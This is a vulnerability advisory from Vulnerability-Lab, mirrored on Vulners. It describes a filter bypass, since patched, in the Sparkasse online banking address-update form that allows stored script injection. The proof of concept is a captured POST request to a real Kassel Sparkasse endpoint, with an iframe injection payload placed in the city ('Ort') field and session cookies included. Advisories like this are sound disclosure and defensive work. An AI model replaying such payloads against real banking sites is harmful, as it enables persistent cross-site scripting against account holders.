Vulners
Lucene search
Sparkasse Online Banking - Filter Bypass Vulnerability
🗓️ 17 Oct 2021 00:00:00Reported by Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.Type 
vulnerlab🔗 www.vulnerability-lab.com👁 102 Views
Document Title:
===============
Sparkasse Online Banking - Filter Bypass Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2264
Release Date:
=============
2021-10-17
Vulnerability Laboratory ID (VL-ID):
====================================
2264
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Filter or Protection Mechanism Bypass
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
The German Savings Banks Finance Group (Sparkassen-Finanzgruppe) is the most numerous sub-sector with 431 savings banks using
the Sparkasse brand, 8 Landesbanken including the DekaBank using separate brands and 10 real-estate financing banks using the
LBS brand. The Deutscher Sparkassen- und Giroverband (German Savings Banks and Clearing Association, DSGV) represents the
interests of the Sparkassen-Finanzgruppe on a national and international level concerning law and the financial services
industry. It also coordinates, promotes and harmonises the interests of Sparkassen.
(Copy of the Homepage: https://en.wikipedia.org/wiki/German_public_bank#Sparkassen )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a filter bypass web vulnerability in the Sparkasse Online Banking web-application (cms).
Affected Product(s):
====================
Sparkasse
Product: Online Banking (Web-Application) [CMS]
Vulnerability Disclosure Timeline:
==================================
2020-09-01: Researcher Notification & Coordination (Security Researcher)
2020-09-02: Vendor Notification (Security Department)
2020-09-04: Vendor Response/Feedback (Security Department)
2021-10-01: Vendor Fix/Patch by Check (Service Developer Team)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
The Sparkasse has installed a new function on its website to update address data. The user is asked whether all data
from the registration process is still up-to-date. In the form itself it is possible to edit the location and other
variables. But if you enter a non-existing city, the form will alternatively ask without secure parsing if the data
should be accepted anyway.
Attackers can now store their own payloads with the address data, which can lead directly to an execution in the
interfaces. Normally, contents with special characters are blocked directly and do not appear in the database.
Here profile information can be manipulated now in such a way that in forms or applications those as interfaces
are used, the manipulated contract information of the profile is used. This allows vulnerabilities such as
Cross Site Scripting or Server Side Request Forgery to be exploited to persistently manipulate the online
banking application or linked services.
The validation class of the forms normally does not allow the transfer of the contents, because the function is
new here the secure verification by the integration was forgotten for verification. All transferred content that
requires content in HTML for e-mails, automated printing/writing or even for delivery in combination with the
address can execute any codes.
Remark: Normally invalid content or wrong input is encoded or escaped directly by the rudimentary Java class.
In this case the input is stored in the database, bypassing all validation mechanisms, and then in third modules
individual manipulations with persistent attack vectors are called up. This can be the manipulation of the address
data of an email or any content that is output by HTML / Javascript functions.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Personendaten (Update)
Vulnerable Parameter(s):
[+] Ort
Affected Module(s):
[+] Hauptwohnsitz – (User Profil Data)
Proof of Concept (PoC):
=======================
The filter bypass vulnerability can be exploited by remote attackers with low user account privileges and wihtout user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.
--- Session Logs (Demo Sparkasse Kassel) ---
Referenz:
*-sparkasse.de/de/home/login-online-banking/personendaten-aktualisieren.html
-
https://www.kasseler-sparkasse.de/if/neo.proxy/pdm/neo/?services=pdm.anschriftpruefen
Host: www.kasseler-sparkasse.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
Content-Length: 1481
Origin: https://www.kasseler-sparkasse.de
Connection: keep-alive
Referer: https://www.kasseler-sparkasse.de/de/home/login-online-banking/personendaten-aktualisieren.html?n=true
Cookie: JSESSIONID=0000n1KJiK2E8f6NnCYAFQjLIyf:b3cb3f1c5; IF6CONTEXT=SVBTVEFOREFSRDo1MjA1MDM1MzpkZTpJRjpmYWxzZTprYXNzZWxlci1zcGs=;
IFCLONE=b3cb3f1c5; IF_SPKDE_CHECK=SPKDE_CHECK
{"clientRequestId":"27466cff-63fb-40df-b11e-f2510333c4c0","requests":[{"id":"0","service":"pdm.anschriftpruefen","data":{"F_99973$$"
:"Seitzemabacherweg","F_25022$$":"22","F_18080$$":"34251","F_14553$$":"Vellmar"><iframe src="evil.source">"},"ctx":{"F_83065$$":
"68806169016169797067"}}],"context":{"F_63959$$":{"F_83065$$":"68806169016169797067","F_42651$$":{"F_45023$$":
["5902-53-28-01.53.54.888000"],"F_61844$$":{"F_62705$$":"NEO_WF","F_68255$$":1597657015770,"F_1602$$":-1,"F_21926$$":
"W_PDM_GPS_NEO_PERSDAT_AKT_START","F_54572$$":"I_PDM_WF_GPS_NEO_PDA_START","F_73309$$":"n02001.004.37326.1614237"},
"F_54716$$":{"F_47161$$":"XK7gNYm1OC1X","F_14066$$":"XWq8tyPCKYVgK1n7doCY6rBKm","F_43514$$":"vNXOzIQDnDoZNeC8eRhqkf3sE",
"F_27084$$":"joZoZk42gl7i","F_38158$$":"zweSauR0pgYs4A"}},"F_347$$":"pdm-1595467796239-5d07250f74054941bbf25facce8dc156",
"F_93388$$":[]},"F_11593$$":{"F_93585$$":"0-9a9ccedb-50bc-4c6e-86a8-4de36dd493f0","F_65941$$":"5498-50-13-01.50.03.293000",
"F_43610$$":"3978-47-02-08.47.12.843000","F_78819$$":"4190-03-05-12.19.17.405813","F_70165$$":"8958024679860394","F_2785$$":
"2FF81A0603AB17FC0001004","F_74914$$":"vR2428n","F_80587$$":"7M3GtAJNSl3","F_7860$$":"058","F_5646$$":"IKS02",
"F_96928$$":"7169-14-27-05.14.20.119000","F_45405$$":"W_PDM_GPS_NEO_PERSDAT_AKT_START","F_93384$$":"I_PDM_WF_GPS_NEO_PDA_START",
"F_58231$$":"A_PDM_NEO_PERSDAT_AKT_IF","F_12460$$":"W_PDM_NEO_PERSDAT_AKT_IF","F_79272$$":
"I_PDM_A_NEO_PERSDAT_AKT"},"F_53847$$":"g3Q3KmlA0J0GFEtqUi1oUUHS2dI8qh"}}
-
POST: HTTP/1.1 200 OK
Date: Mon, 17 Aug 2020 09:39:21 GMT
Server: Apache
X-UA-Compatible: IE=edge
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Cache-Control: no-store
Last-Modified: Mon, 17 Aug 2020 09:39:21 GMT
Content-Language: de-DE
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 942
Content-Type: application/json; charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Remark: Normally invalid content or wrong input is encoded or escaped directly by the java class. Here it is so
that the input is stored in the database past all validation mechanisms and then in third modules to cause individual
manipulations with persistent attack vectors. (Preview: 1.png, 2.png, 3.png)
Solution - Fix & Patch:
=======================
1. Restriction of input fields by limiting special characters
2. Validation and secure encode of the input for transmission via POST method
3. Cleaning before output when displaying the contents in the different areas
4. Alternativ a web-firewall or filter mechanism can be implemented to prevent and identify further attacks of the same characteristics.
Security Risk:
==============
The security risk of the filter bypass vulnerability in the sparkasse online banking web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Oct 2021 00:00Current
7.4High risk
Vulners AI Score7.4